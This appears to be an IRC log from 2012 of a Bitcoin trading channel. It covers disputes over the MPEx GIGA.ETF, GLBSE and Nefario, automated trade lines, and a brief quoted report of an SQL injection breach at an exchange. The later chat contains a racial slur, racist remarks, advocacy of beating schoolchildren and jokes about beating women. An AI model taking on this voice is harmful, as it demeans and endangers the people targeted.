06:57:02 odd. Oct 31 07:01:11 Nefario claimed not to be using user's funds. Theymos, thinking "wait, Nefario certainly does not have the money to pay for it, he probably used the users's funds". And went ahead making an official statement that Nefario used. Now that's assumption put forward as facts. You stated the data for the ETF would be deleted (A general statement which seems to indicate any data related would Oct 31 07:01:11 be erased), that data would be kept along signed statement (as in all your data too, it was a bit of confusion in my understanding), and then the part with smickles where it went unanswered if you'd honor signed statements (not very useful if you don't keep your part of the signed data). Oct 31 07:01:51 the fact zinger was about the legal stuff re nefario Oct 31 07:01:56 As such, I might have been wrong. But I never presented it as a fact. Although technically we're on a public medium in this channel, this was a conversation between you and me. Oct 31 07:02:17 BTC-Mining If you don't know the facts, he claims to have asked the FSA about it long ago but they claimed not to be concerned by anything Bitcoins related. (Probably miscommunication). Trying to go legal, he consulted again and was told to stop or he could be charged. Oct 31 07:02:17 mircea_popescu you know this as a fact ? Oct 31 07:03:58 Misstating fact would be me going right away without further discussion or confirmation on bitcointalk loudmouthing how it is a fact you'll delete all signed transactions for the GIGA.ETF rendering taking backups useless. Oct 31 07:04:59 hehe okay. Oct 31 07:05:34 I came for answers and although your statements were a bit cryptic at first, I ended up with my answers. Oct 31 07:06:31 As for the other part where I claim facts, I cannot actually claim direct sighting of those facts. Oct 31 07:06:35 hey, so did everyone else. WHETHER THEY WANT TO OR NOT!!1 Oct 31 07:06:37 Only that I know of it from Nefario's meeting with the shareholder, for which the log is not disputed by any shareholder. Oct 31 07:06:54 nefario has this bad habit of lieing through his teeth. Oct 31 07:07:07 very self-righteously about it, too. Oct 31 07:07:18 [MPEX] [S.MPOE] 23244 @ 0.00045762 = 10.6369 BTC [-] Oct 31 07:07:19 [MPEX] [S.MPOE] 31616 @ 0.00045734 = 14.4593 BTC [-] Oct 31 07:07:43 No, but some credible or related people have made the claims and have seen them. And I said the fact was Nefario CLAIMED it, not if he lied or not about it. Oct 31 07:08:05 i've been so far perfectly unable to confirm much of it. but who knows. Oct 31 07:08:11 My complain is people passing as fact something they have no credible claim to pass it as a fact. Oct 31 07:08:43 Like theymos passing as a fact Nefario was using user's funds solely because "He thought so" Oct 31 07:09:15 While what I claim Nefario claimed has a public log not contested by GLBSE shareholders of their meeting. Oct 31 07:09:22 tbh, i thought that perfectly credible. Oct 31 07:09:38 (knowing that he had spent glbse money w/o permission, which isn't disputed) Oct 31 07:10:34 No one has any proof Nefario used any of GLBSE's users funds to pay for his lawyer. Theymos just decided it was so. Oct 31 07:11:34 While the log for the meeting is not disputed by multiple people being witness of said conversation, which gives a certain credibility and Nefario said what he said in thos logs. Oct 31 07:11:50 credibility that* Oct 31 07:12:23 One is completly hypothetical and based on nothing. The other is based on multiple witness accounts. Oct 31 07:13:04 it's in those same logs that nefario spent glbse/bcglobal money w/o asking. Oct 31 07:14:51 He said he wanted Bitcoin Global to pay for the lawyer he hired for himself. Oct 31 07:15:54 He denied that he used the users' funds for it and merely claimed to want the expenses to be paid by Bitcoin Global which had money that was not the users' funds. Oct 31 07:16:57 Theymos decided to screw it and just tell everyone Nefario used the users' funds to pay for his lawyer. Oct 31 07:17:22 At least this is what the logs afterward seems to show and he didn't dispute them. Oct 31 07:19:09 I'd have to find it, but I even recall theymos later posting that he had no actual idea if Nefario did that, he just thought he probably did. Oct 31 07:21:02 Note that my previous statement states that I "recall" seeing such a post, not that it actually happened. Oct 31 07:21:08 Let me try and find that. Oct 31 07:21:49 Well that's not it... but it's interesting nonetheless... Oct 31 07:21:52 https://bitcointalk.org/index.php?topic=115669.msg1307789#msg1307789 Oct 31 07:22:12 BTC-Mining im not even sure it matters that much eh ? Oct 31 07:22:40 Not at all... Looks like theymos is doing something else completly on his side. Oct 31 07:25:18 ah, here's one of them: https://bitcointalk.org/index.php?topic=118354.msg1283157#msg1283157 Oct 31 07:25:34 He only indirectly admits it in this one, but should be sufficient. Oct 31 07:26:39 The point being, there's a difference between made up scenarios you have in your head and "facts" involving direct claims/witnesses. Oct 31 07:27:13 And I don't like people rushing things as fast on the forum without any proof or reasonable evidence. Oct 31 07:28:28 Hence why I asked you here for more info (got satisfied), instead of going on the forum creating more drama. Oct 31 07:32:25 [MPEX] [S.MPOE] 11700 @ 0.00045826 = 5.3616 BTC [+] Oct 31 07:54:44 * mircea_popescu wonders if everyone else is alseep/sexting/busy not giving a shit or quite the contrary, in awed silence at the sheer genius of the debate unraveling before their very eyes. Oct 31 07:55:45 Not asleep, just taking a long time to backtrack to figure out if the whole dramafest-recap-and-rerun was ultimately just something thinking "discard as worthless" implied or intended "deletion of records" Oct 31 07:56:02 s/something/someone/ Oct 31 07:56:20 well i guess all this is new, so people make varied assumptions Oct 31 07:56:27 in the end it's not bad, sets precedents etc Oct 31 07:56:52 (yes we deleted the shares as worthless. Oh suddenly dividends turn up? no we didn't delete rcords, presto undelete...) Oct 31 07:57:40 [MPEX] [S.MPOE] 300 @ 0.00046 = 0.138 BTC [+] Oct 31 07:57:42 oops s/yes we deleted/yes we discarded/ ... s/presto undelete/presto dumpsterdive/ Oct 31 07:58:59 a technical loophole - we dis-carded as in its not writ on stone nor cardboard anymore, more of a mere paper trail ow Oct 31 07:59:24 moreover, it won't be showing up anymore. Oct 31 07:59:43 you know, you can't just not show people symbols in stats w/o teling them in advance Oct 31 07:59:47 (at least imo) Oct 31 07:59:52 Or are you basically trying to buy them all back so that by the time they are "discarded as worthless" no one is stuck with any anyway? Oct 31 08:00:25 no, im just trying to explain to ppl why starting dec 1st there won't be any f.giga.etf listed in their STAT responses Oct 31 08:00:53 oh right, the real actual effect is actual de-listing Oct 31 08:01:21 the "discarded as worthless" part is what? more a colloquialism? or a technical term meaning something specific? Oct 31 08:02:25 I have lots still in backscroll I havent scrolled back as far as yet Oct 31 08:05:19 seems maybe similar/related to the "a beneficiary was intended" stuff in contracts, mentioned in some pirate threads Oct 31 08:05:47 you got the stuff from Nefario/GLBSE for the purpose of others receiving it Oct 31 08:06:27 so even though it was you who dealt with Nefario the people you got them for still have claim through to Nefario, "in equity", maybe Oct 31 08:06:58 so I dont see much big reason why you should be prevented from bowing out Oct 31 08:07:14 maybe not an reason really Oct 31 08:08:34 but, you did use the term ETF rather than pass-through, even though you also commented maybe casually rather than stated officially/technically that it was kind of sort of maybe at least much akin to a passthrough Oct 31 08:18:13 Well, basically, yes. I was asking mircea about what was going to be deleted and understood his statements differently than what he meant. Oct 31 08:18:48 In the end, everything was fine, but we each lost ~2-3 hours of meaningless argumentation. Oct 31 08:20:20 Hmm, I somehow managed to end up reading a thread about some Intersango drama dating september 2011 Oct 31 08:20:34 [05:34] BenDavis, we're an agent Oct 31 08:20:34 [05:34] so the answer isn't yes or no Oct 31 08:20:34 [05:34] <@BenDavis> Are they YOUR coins, yes or no. Oct 31 08:20:34 [05:34] <@Geebus> By that definition, our users have stolen 26200 bitcoins from us through transactions we have sent to them. Oct 31 08:20:34 [05:34] <@BenDavis> the answer is NO. Oct 31 08:20:35 [05:35] <@BenDavis> So. You sending them when they are not yours... makes YOU the thief. Oct 31 08:21:06 It looks like BenDavis has no understanding of the concept of "intent" in the law. Oct 31 08:22:48 [MPEX] [S.MPOE] 9500 @ 0.00046026 = 4.3725 BTC [+] Oct 31 08:27:56 ok done the backscroll. Sounds like MPEx should do like GLBSE ought to, which is, release the info to in this case givavps Oct 31 08:28:35 send gagavps data that will allow MPEx people who held gigavps shares through GLBSE->MPEx to contact giva directly Oct 31 08:28:40 s/giva/giga/ Oct 31 08:29:44 since people were explicitly warned up front that whether the PGP identity they use at MPEx would correlate to their real identity was in their own hands, Oct 31 08:29:55 Nah, nah Oct 31 08:30:13 possibly it might even be that MPEx can simply directly tell gigavps which PGP identity held how much Oct 31 08:30:49 I say "possibly" because I do not recall whether MPEx let me use as my PGP identity my normal one, my OTC one, whose publicly listed email address does not exist Oct 31 08:31:04 It seems that if appropriate and feasible, and someone makes a claim with a signed statement Mircea finds out to be receivable, he will honor the claim. Oct 31 08:31:32 I think MPEx did let me do that, and if so, then anyone could have made up any ficitional but syntactically possible email address to make up a PGP identity for Oct 31 08:31:55 thus whether giga would learn who they are given their PGP identity is up to them, as they were told from the start Oct 31 08:32:12 I don't think mircea would do that. Oct 31 08:32:53 I am pretty sure MPEx does not refuse email orders that come from an email address that is not officially tied to the PGP identity whose orders that email address is sending Oct 31 08:33:43 email orders? Oct 31 08:33:57 Because, I recall being annoyed recently at some other site or service or somesuch that rejected my PGP identity seemingly due to its email address (one that does not exist thus doesnt receive spam) not being where I emailed from Oct 31 08:34:11 doesn't MPEx take orders via email? Oct 31 08:34:27 I thought I registered there by sending a PGP-crypted email? Oct 31 08:34:52 later I say one could paste into a web form but was that the only way? was there never a send orders by email? Oct 31 08:35:04 s/later I say/later I saw/ Oct 31 08:35:40 Mircea should not have to worry about later claims and honouring them Oct 31 08:36:17 he should just send giga the list of shareholders just like GLBSE is theoretically imagined to be planning to maybe someday do Oct 31 08:36:49 knotwork "anyone could have made up any ficitional but syntactically possible email address to make up a PGP identity for" << this part is correct Oct 31 08:37:17 but unlike GLBSE he need not do weird codes shit, since he told everyone up front that if they want to be anonymous they should create a PGP identity no one knows is them. didnt he? or am I confused having just read bunch of how to Torify email sites? Oct 31 08:37:28 BTC-Mining back a year or so ago mpoe traded by email. i think knotwork isn't up to date with the new trade paradigm Oct 31 08:37:52 knotwork nah gpg string is just submited as a post to an url. Oct 31 08:37:57 My OTC identity is webmaster@makemoney.knotwork.com, which deliberately is no longer spammable Oct 31 08:38:35 some idiot service recently refused to let me use that identity because I sent them the email from a real email address that can actually accept email Oct 31 08:38:43 and also yes, everyoen was told. it's in the faq :" http://polimedia.us/bitcoin/faq.html#18 Oct 31 08:39:32 so there ya go mircea, just give giga the full data on how much of your passthrough each PGP identity owned Oct 31 08:40:07 was the scale such that some owners might have owned thereby a fractional number of actual gigavps? Oct 31 08:40:20 or was it scaled so it can even actually come out as integers? Oct 31 08:41:06 regardless, giga can no doubt handle it, nd you can give him that info sooner than he hears from GLBSE how many actual shares your entire bunch of PGP people had between them Oct 31 08:41:13 I'm almost sure he won't do that. Oct 31 08:41:40 oh is he one of the "I never sold anyone anything" like Goat not long ago said? Oct 31 08:41:50 I don't see mircea going around asking the ETF holders if they want their information disclosed to Gigavps Oct 31 08:41:59 No, not any of that nonsense Oct 31 08:42:06 their infomration wont be disclosed to gigavps Oct 31 08:42:30 only the information about a bunch of anonymous sock puppets / PGP identities would be released Oct 31 08:42:55 any relation between those identities and actual people the people were warned up front not to cause/create Oct 31 08:43:12 i'm sure not everyone did that Oct 31 08:43:20 knotwork there's plenty of problems. for once the scale is 1:1000, for another it wasn't a direct holding, and i see no good reason to pressure giga this way (which would be really abusive tbh) Oct 31 08:43:26 I deliberately used my best known PGP identity Oct 31 08:43:40 and why should giga trust that mircea_popescu only issued a proportional amount of the etf shares? Oct 31 08:43:42 and in general it'd be a premier way to cause a mess. i'll pass Oct 31 08:44:00 so if I owned giga passsthrough shares I would of course suffer the consequences of having used a known identity Oct 31 08:44:08 I believe he'll pay out what Gigamining's shares pay to the ETF holder if any receivable claim arrise in the future, where the info would eventually be disclosed and Gigavps would resume payments, and where the claimer has receivable proof he held ETF units. Oct 31 08:44:11 and possibly other conditions I'm missing Oct 31 08:44:18 knotwork this is something that MAY happen, but i'll still try and protect them Oct 31 08:44:44 BTC-Mining i tell you, the shit we get involved in here would put to shame a full fledged commercial paper litigation house Oct 31 08:45:10 I was an early adopter invitee, so possibly the invite actually was contingent upon my using my OTC identity? Oct 31 08:45:46 i think you only had to prove an ident was you, not have it be the ident for mpex Oct 31 08:45:52 though had I wanted to use an anonymous one maybe ... Oct 31 08:45:57 yes as I was typing Oct 31 08:46:11 I would have come here and argued for it, proven it was me Oct 31 08:46:12 heh, sry to seal you thunder :) Oct 31 08:46:44 also it was more about issuing assets maybe than buying other peoples assets Oct 31 08:47:07 Mircea, they'd all say: "We're sorry, but the criterions for your case does not make you not eligible to be a client of ours." Oct 31 08:47:20 he wanted well known/identified people to come look at his system and consider issuing something there Oct 31 08:47:52 Where criterions are the applicable laws and the fact the case does not bring any receivable proof for the litigation to apply those laws. Oct 31 08:47:55 oh, that musta been beta b/f the beta i knew of Oct 31 08:47:57 [MPEX] [S.MPOE] 2900 @ 0.00046026 = 1.3348 BTC [+] Oct 31 08:48:40 or maybe another side of the same 'beta-coin' Oct 31 08:48:46 re "They", maybe "they" would say of course your offshore corp in a place that doesnt reveal corp owners is not anonymous and we will not hide its identity Oct 31 08:49:23 in other words, if you wanted anonymity you provided it to yourself if you didnt well sorry you didnt, not my problem Oct 31 08:50:18 your PGP identity is your offshore or not corp that does or does not reveal its owners Oct 31 08:50:38 I meant that for any case where funds were stolen, you'd have to prove in courts who you sent the bitcoins to. Oct 31 08:51:02 And that may well be denied by the defendant and impossible to prove. Oct 31 08:51:09 huh? Oct 31 08:51:22 to prove someone stole my wallet I have to prove where I spent its contents? Oct 31 08:51:53 No, to prove someone stole your funds, you'd have to prove you ever sent it to that person. Oct 31 08:52:17 no, that would be to attempt to claim fraud or fiduciary negligence etc Oct 31 08:52:31 stolen is when I didnt send them to anyone yet I no longer have them Oct 31 08:52:57 sending them to someone who then fails to do right by me in regard to them is a bit more complicated Oct 31 08:53:09 it gets into why I sent them to them in the first place Oct 31 08:53:17 Ah, sorry. I was not using legal terms, only the general meaning of stealing. Oct 31 08:53:26 Yes, financial fraud. Oct 31 08:53:33 Was what I was referring to. Oct 31 08:53:38 and I do not have to prove I sent them, the blockchain proves a certain private key ordered them sent Oct 31 08:54:03 And if that person was always dealing from TOR, never tied the bitcoins to a transaction toward one of his bank account and denies owning the address, you can't provide a proof. Oct 31 08:54:09 and that same private key can also sign a digital statement to the effect that it wants them back and why Oct 31 08:54:25 http://trilema.com/2012/conversation-discarded-as-worthless/ convo of doom Oct 31 08:54:27 for the ages. Oct 31 08:54:37 Thank you, thank you. Oct 31 08:54:43 oh no Oct 31 08:54:49 i hit the paywal Oct 31 08:54:50 I take credit for this mess. Oct 31 08:54:56 paywall* Oct 31 08:55:05 give it a week s Oct 31 08:55:08 You've been immortalized, again? Oct 31 08:55:16 and now gents, im wasted so catch you all tomorrow. Oct 31 08:55:18 /¯(°_o)/¯ Oct 31 08:55:23 nn Oct 31 08:55:30 Goodbye Mircea. Oct 31 08:55:38 BTC-Mining: i dunno, i hit mircea's paywall Oct 31 08:56:11 gnite Oct 31 08:56:30 oh he has one of those you read too much things? Oct 31 08:56:47 take it as a hint that you read too much :) Oct 31 08:56:52 knotwork, yes there's signed digital statements, but I meant to answer Mircea's statement about commercial litigation house Oct 31 08:57:15 Where if you were to pursue some actual person for financial fraud. Oct 31 08:57:30 wow, you get 1000 article views for 1 usd in btc Oct 31 08:57:34 nah it'd have to be a PGP-class action suit :) Oct 31 08:58:09 some lawyer pursuing the person on behalf of a bunch of layr-client-priviledged PGP keys Oct 31 08:58:29 treat it as them being the lawyer's sock-puppets Oct 31 08:58:33 "Trilema happens to be the first blog in the world that switched to a paid model, imitated about a year later by The New York Times." Oct 31 08:58:43 no need for any of them to actually ever have been anyone else Oct 31 08:58:48 Which would be worthless, considering most scammers in Bitcoin where always on TOR and used gpg identity not officially tied to anyone. Oct 31 08:59:04 i'd be fucked as a scammer Oct 31 08:59:32 Their simple denial to have any knowledge of it ever happening or holding the coins would be accepted and they're free. Oct 31 08:59:50 Yeah I learned years ago that I read the NYT and WSJ and such way too much Oct 31 08:59:59 There's no proof, if the scammer was careful and went away with funds. Oct 31 09:00:05 too much being, once in a few years Oct 31 09:00:11 No trace and no way to chargeback. Oct 31 09:00:41 BTC-M, also no way to get my coins without hacking my machine / coldwallet :) Oct 31 09:00:56 Also that. Oct 31 09:01:02 It goes both ways. Oct 31 09:01:09 or are you implying I was born yesterday? :) Oct 31 09:02:05 Well... I don't know... I suppose each other throwing general statements we already know at each other just like that is quite pointless... Oct 31 09:02:58 :) Oct 31 09:03:05 I motion that we stop this topic this instant. All in favor: Oct 31 09:03:08 Aye Oct 31 09:03:30 Hitler! Nazi! Holocaust! **** BEGIN LOGGING AT Wed Oct 31 18:12:11 2012 Oct 31 18:27:52 [MPEX] [S.MPOE] 1139 @ 0.0004606 = 0.5246 BTC [+] Oct 31 18:27:54 [MPEX] [S.MPOE] 14861 @ 0.00046355 = 6.8888 BTC [+] Oct 31 18:41:12 Some user used an SQLi to get into the System and stole the API keys from the users. Oct 31 18:41:12 I will be honest: Oct 31 18:41:12 He used the http://bitcoin-24.com/EUR/trades.json to get into the System. Oct 31 18:41:15 this is nice Oct 31 18:53:02 [MPEX] [S.MPOE] 26539 @ 0.00046355 = 12.3022 BTC [+] Oct 31 18:53:04 [MPEX] [S.MPOE] 15961 @ 0.0004636 = 7.3995 BTC [+] Oct 31 19:01:37 so who wanted to play monopoly yest ? smickles ? thestringpuller ? Oct 31 19:08:24 for btc? Oct 31 19:08:28 how do you play that Oct 31 19:09:05 i dunno they were asking me yest ? Oct 31 19:09:08 i wanted to check it out Oct 31 19:09:55 mircea_popescu: #bitcoin-monopoly Oct 31 19:10:04 we've gathered people there who wants to play monopoly Oct 31 19:10:37 a ok Oct 31 19:13:07 play money or virtual money? Oct 31 19:13:08 :> Oct 31 19:13:29 sadly it takes some download Oct 31 19:13:35 monopoly itself is via client-server but we sometimes to btc buy-in, winner winning all Oct 31 19:13:42 yeah its for linux/mac/windows Oct 31 19:13:50 do* Oct 31 19:14:00 what the avg game lenght Oct 31 19:14:04 whats Oct 31 19:14:16 it varies, 30-60min Oct 31 19:14:18 usually less Oct 31 19:14:37 dafuq, it took hours in rl Oct 31 19:14:41 even days sometimes Oct 31 19:14:44 lol Oct 31 19:14:53 well if everyone plays without afking it's fast Oct 31 19:15:00 if someone goes afk after his turn it will take long =D Oct 31 19:15:01 a fking what? Oct 31 19:15:17 copumpkin btw i did get banned for practicly no reason Oct 31 19:15:22 just fyi Oct 31 19:15:43 did not yell or claim anything to him via pm, it's nonsense Oct 31 19:16:08 talk to nanotube about it Oct 31 19:16:10 you got banned in monopoly ?! Oct 31 19:16:26 at -otc Oct 31 19:16:26 lol Oct 31 19:16:26 copumpkin: i will. Oct 31 19:16:52 it's just sad he's humiliating me there. and my friends, too Oct 31 19:17:02 who ? Oct 31 19:17:03 "let's ban the kids" and bans 3 more guys Oct 31 19:17:08 gmaxwell... Oct 31 19:17:11 ahaha Oct 31 19:17:15 ;;rated gmaxwell Oct 31 19:17:16 You rated user gmaxwell on Sun Apr 8 09:54:19 2012, giving him a rating of -10, and supplied these additional notes: hypocritical idiot.. Oct 31 19:17:21 ymmv. Oct 31 19:17:41 hmhnv Oct 31 19:18:11 [MPEX] [S.MPOE] 23279 @ 0.00045922 = 10.6902 BTC [-] Oct 31 19:18:13 [MPEX] [S.MPOE] 25921 @ 0.00045853 = 11.8856 BTC [-] Oct 31 19:18:23 ;;google hmhnv Oct 31 19:18:24 Muqaatil bin Hayyaan (d. 150H) - AboveTheThrone.Com: ; nevada - MesoWest - University of Utah: ; Philippe geubels - free download - (1 more message) Oct 31 19:18:38 islam ?! Oct 31 19:18:46 I'm a secret imam Oct 31 19:18:56 (his mileage has not varied) Oct 31 19:34:33 ;;rate mircea_popescu 3 market hacker Oct 31 19:34:34 Rating entry successful. Your rating of 3 for user mircea_popescu has been recorded. Oct 31 19:41:58 im a market hacker and im ok Oct 31 19:42:04 i hack all night and i hack all day Oct 31 19:43:06 i cut down btc, i wear high heels, suspenders aaand a braa Oct 31 19:43:25 [MPEX] [S.MPOE] 24427 @ 0.00045853 = 11.2005 BTC [-] Oct 31 19:43:26 [MPEX] [S.MPOE] 23895 @ 0.00045811 = 10.9465 BTC [-] Oct 31 19:48:02 today's investment: https://btcjam.com/listings/299 Oct 31 19:48:49 i like the plural. Oct 31 19:49:56 plural* Oct 31 19:49:59 ?* Oct 31 19:50:05 possessive you mean Oct 31 19:50:43 of an ex wife Oct 31 19:58:38 mircea_popescu: do you think educationis welfare? Oct 31 19:58:51 public education* Oct 31 19:59:12 i think education that does not include regular beating is an exercise in stupidity indistinguishable from welfare. Oct 31 19:59:52 violence is not the answer, mircea_popescu. Oct 31 20:00:50 oyesitis. Oct 31 20:01:18 make a rule that all kids scoring in the last quartile of their class take ten across the buttocks Oct 31 20:01:27 and get out of the way of sat scores explosion Oct 31 20:01:49 not at all Oct 31 20:02:12 tests do not work. Oct 31 20:02:26 right right. Oct 31 20:02:39 that's why the chinese have taken over the past 20 years Oct 31 20:02:43 because tests don't work. Oct 31 20:03:02 an' violence is not the answer Oct 31 20:04:01 well, then you have to actually quantify what "china taking over" is Oct 31 20:04:14 because remember, they owe the federal reserve more money than the US government owes china Oct 31 20:04:44 eh ? Oct 31 20:04:58 yes, most of the money china loaned us, the federal reserve loaned them Oct 31 20:05:00 look around the house for some item made in the us. Oct 31 20:05:04 and stop believing the bs. Oct 31 20:05:27 okay, so they make shit, so what? Oct 31 20:05:27 I'm not sure the US education system is trying to optimize for "made in the US" Oct 31 20:05:34 not that I think it's all that great, either Oct 31 20:05:34 copumpkin: this is true Oct 31 20:05:41 it just doesn't seem like a particularly meaningful metric to measure by Oct 31 20:05:41 its optimizing for "the US owns the company who made it" Oct 31 20:05:47 we outsourced slavery to China Oct 31 20:05:49 copumpkin are you familiar with how archeologists score dominance in the field ? Oct 31 20:05:55 plain and simple Oct 31 20:05:58 nope Oct 31 20:06:07 they simply count the objects found. Oct 31 20:06:11 mircea_popescu: okay, so the jews were dominant in egypt? Oct 31 20:06:13 okay... Oct 31 20:06:15 more roman, less celtic ? romans owned celts. Oct 31 20:06:17 they built the pyramids after all. Oct 31 20:06:25 and…? :P Oct 31 20:06:33 and thus taking over. Oct 31 20:06:40 meh :P Oct 31 20:06:44 hey. Oct 31 20:06:53 mircea_popescu thinks he knows things, how cute Oct 31 20:06:59 they do it that way presumably for lack of better data Oct 31 20:07:04 go back to "beating" your "women", and by that, I mean posting images and saying its you. Oct 31 20:07:06 I don't really care what archeologists will think Oct 31 20:07:11 copumpkin you're welcome to show your preferred data is better. Oct 31 20:07:30 unfortunately, the time of archaeologists is over Oct 31 20:07:35 if we pay a bunch of poor laotians to make our sweaters, and all our sweaters are made in laos, that doesn't mean laos is taking over Oct 31 20:07:40 it means they're cheaper Oct 31 20:07:43 too much data from this time period will permanently recorded Oct 31 20:07:49 it also doesn't mean they're better educated Oct 31 20:07:53 copumpkin did you just take a system, posit that it's wrong and thus proved it being wrong ? Oct 31 20:08:07 cause im starting to dislike british education too by this measure. Oct 31 20:08:15 nope, I thought you were advocating doing that? Oct 31 20:08:25 I wasn't educated in the british system Oct 31 20:08:32 i said the chinese were taking over, asked how do i measure this i showed how i measure it. Oct 31 20:08:33 [MPEX] [S.MPOE] 9548 @ 0.0004619 = 4.4102 BTC [+] Oct 31 20:08:42 the system as presented stands. inconvenient as that may be ideologically. Oct 31 20:08:49 mircea_popescu: yeah, and I just pointed out that it sounds silly with my laotian example Oct 31 20:08:56 i don't see it sounds silly. Oct 31 20:09:01 moar child beating! Oct 31 20:09:28 I dont want to beat children Oct 31 20:09:32 just adult women Oct 31 20:09:37 but i;'dbe very interested to hear mopre about this "us ultimately owns the money, and it lent it to china for china to lend it back" Oct 31 20:09:39 seriously, delicious boobs, om nom nom Oct 31 20:09:48 it was really delicious dmc-level of thinking. Oct 31 20:09:53 did I say that? Oct 31 20:09:56 or is Diablo talking? Oct 31 20:09:56 no, Diablo-D3 Oct 31 20:09:58 oh okay Oct 31 20:10:00 :P Oct 31 20:10:06 you're missing out :p Oct 31 20:10:45 Dr. Dre Beats? Oct 31 20:10:47 also we should ignore pigeons he's a troll Oct 31 20:10:48 what does he beat Oct 31 20:10:51 he beats your ears? Oct 31 20:10:59 he beats your wife so you don't have to Oct 31 20:11:01 I wonder what his doctorate is in Oct 31 20:11:08 it'd be funny if someone awarded him an honorary one Oct 31 20:11:18 mircea_popescu: but I don't have a wife! Oct 31 20:11:20 he has a doctorate in gravity Oct 31 20:11:44 copumpkin even better, imagine the expense and difficulty of beating the wife you don';t even have. dr. dre got your ass! Oct 31 20:11:53 covered, i mean. Oct 31 20:11:56 or w/e Oct 31 20:11:58 good point Oct 31 20:12:02 alright, I approve Oct 31 20:12:07 I'm gonna go buy some of his beats Oct 31 20:12:12 mircea_popescu: okay so Oct 31 20:12:16 by your reasoning Oct 31 20:12:30 I'm making beef jerky Oct 31 20:12:32 black people, fresh off the boat from africa, were dominant in the south before the civil war Oct 31 20:12:37 since they did all the work Oct 31 20:12:44 Diablo-D3: don't you usually use another word for them? Oct 31 20:12:47 did all the work != made all the itams Oct 31 20:13:03 you need to stop glossing when trying to think, it's unseemly. Oct 31 20:13:16 copumpkin: no, I reserve that word for the black people who bring up that their ancestors were such and that it means something in their daily lives Oct 31 20:13:24 oh, I see! Oct 31 20:13:35 makes perfect sense, carry on Oct 31 20:13:38 he's not racist, he's culturally-aware debateist Oct 31 20:13:41 yeah Oct 31 20:14:15 mircea_popescu: okay so, the black slaves _did_ do all the work and make all the items Oct 31 20:14:21 what such items ? Oct 31 20:14:27 wooden dildos Oct 31 20:14:30 lol Oct 31 20:14:50 all food was handled by slaves, from the fields to the dinner table. Oct 31 20:15:14 they made pretty decent music, which would count as an item for this conversation, except it wasn't valued at the time. arguably that gives them a leg to stand on Oct 31 20:15:19 food is the single largest industry in the world, and has been so for the past 6000 years. Oct 31 20:15:21 hence all the current attention being paid to niggers in the us. Oct 31 20:15:36 food is however not much of an item in this discussion Oct 31 20:15:52 so the _single largest industry in the world_ is not viable for this discussion? the hell? Oct 31 20:16:01 thats some republican style debating going on there. Oct 31 20:16:12 but you understand what we're discussing right ? Oct 31 20:16:27 yes, we're discussing if china is dominant or not Oct 31 20:16:33 right. Oct 31 20:16:43 and Im of the camp that they're not, not when they owe us that much money Oct 31 20:16:45 now, in china iron pots and pans handle most of the food Oct 31 20:16:59 does this mean the evil empire of iron pots is dominant in china ? Oct 31 20:17:00 always seems to be an intelligent discussion when the n word is used Oct 31 20:17:13 yup Oct 31 20:17:19 pigeons you know the knights of ni sketch ? Oct 31 20:17:25 yep Oct 31 20:17:30 ever considered it's a reference ? Oct 31 20:17:35 china's GDP is $11 trillion, they owe us around twice that. Oct 31 20:17:43 (thats a little over $8k per capita, btw) Oct 31 20:18:00 i love monty python too but i dont pretend it makes calling people that name any less silly Oct 31 20:18:27 so either they're our slave labor (at worst) or we just own all the major exporting companies (at best) Oct 31 20:18:30 you know china holds about 1.2 trillion right ? Oct 31 20:18:42 china also makes baijiu Oct 31 20:18:44 really tasty liquor Oct 31 20:18:59 actually as it stands right now, the chinese own more of the us than americans do. Oct 31 20:18:59 mircea_popescu: yes, so? they owe us around twice their GDP. Oct 31 20:19:03 by a wide margin. Oct 31 20:19:11 anything china owns in us, we own by default. Oct 31 20:19:17 ... Oct 31 20:19:21 fascinating. Oct 31 20:19:37 now, if they were to pay what they owe, yes, you would have a legitimate argument Oct 31 20:20:40 now, normally I would say our investment in their country was a good one, except the federal reserve did it without foreknowledge of congress or the treasury or the president. Oct 31 20:21:05 technically, congress could force china to pay back the entire amount now since the contract may not have been legal to begin with. Oct 31 20:21:21 I would rather go for a debt swap however. they owe us slightly more than we owe them. Oct 31 20:21:34 o rly ? Oct 31 20:21:38 it would collapse the chinese economy, but thats not my problem. Oct 31 20:22:37 they make about 5% annually on the trade difference due to the debt, or about $1.1 trillion a year. Oct 31 20:23:04 i happen to think this conversation is a great argument for educational brutality. Oct 31 20:23:11 and i do mean brutality. Oct 31 20:25:01 nah, i can't be bothered to do it myself. Oct 31 20:25:11 you'd better, or he'll do it to you Oct 31 20:25:36 but i imagine a correct solution would be something like, make further endowments dependent on beatings documentation. Oct 31 20:25:43 we're not equals. Oct 31 20:27:34 NO U Oct 31 20:28:44 so there you have it thestringpuller. happy nao ? Oct 31 20:29:19 we need to get Luke-Jr into this Oct 31 20:33:14 ahaha Oct 31 20:33:16 wtf i just did Oct 31 20:33:28 do you feel enriched nao ? Oct 31 20:34:35 [MPEX] [S.MPOE] 3561 @ 0.0004636 = 1.6509 BTC [+] Oct 31 20:36:26 can't exactly name it Oct 31 20:36:45 [MPEX] [S.MPOE] 25878 @ 0.0004636 = 11.997 BTC [+] Oct 31 20:36:46 [MPEX] [S.MPOE] 30900 @ 0.00046437 = 14.349 BTC [+] Oct 31 20:36:48 [MPEX] [S.MPOE] 26190 @ 0.00046532 = 12.1867 BTC [+] Oct 31 20:36:49 [MPEX] [S.MPOE] 1700 @ 0.00046553 = 0.7914 BTC [+] Oct 31 20:36:50 [MPEX] [S.MPOE] 11100 @ 0.00046819 = 5.1969 BTC [+] Oct 31 20:36:50 well i put most of it on my blog, too Oct 31 20:36:51 [MPEX] [S.MPOE] 23200 @ 0.00047029 = 10.9107 BTC [+] Oct 31 20:36:52 [MPEX] [S.MPOE] 35700 @ 0.00047077 = 16.8065 BTC [+] Oct 31 20:36:53 [MPEX] [S.MPOE] 7700 @ 0.0004739 = 3.649 BTC [+] Oct 31 20:36:54 [MPEX] [S.MPOE] 22622 @ 0.00048788 = 11.0368 BTC [+] Oct 31 20:36:54 if you feel like you need to re-read Oct 31 20:36:54 [MPEX] [S.MPOE] 5600 @ 0.00048934 = 2.7403 BTC [+] Oct 31 20:36:55 [MPEX] [S.MPOE] 10000 @ 0.00049999 = 4.9999 BTC [+] Oct 31 20:36:56 [MPEX] [S.MPOE] 199410 @ 0.0005 = 99.705 BTC [+] Oct 31 20:37:07 MUST...RESIST... Oct 31 20:38:24 lol Oct 31 20:38:50 in similar situation i'd prolly just start to troll btc-mining or fell asleep Oct 31 20:39:05 i am made of steel. Oct 31 20:39:17 couldn't believe how it went on and on Oct 31 20:39:53 good future investment, people can just be given a link Oct 31 20:43:02 i think i'll bring it to next level and start tvtropes page about trilema blog... 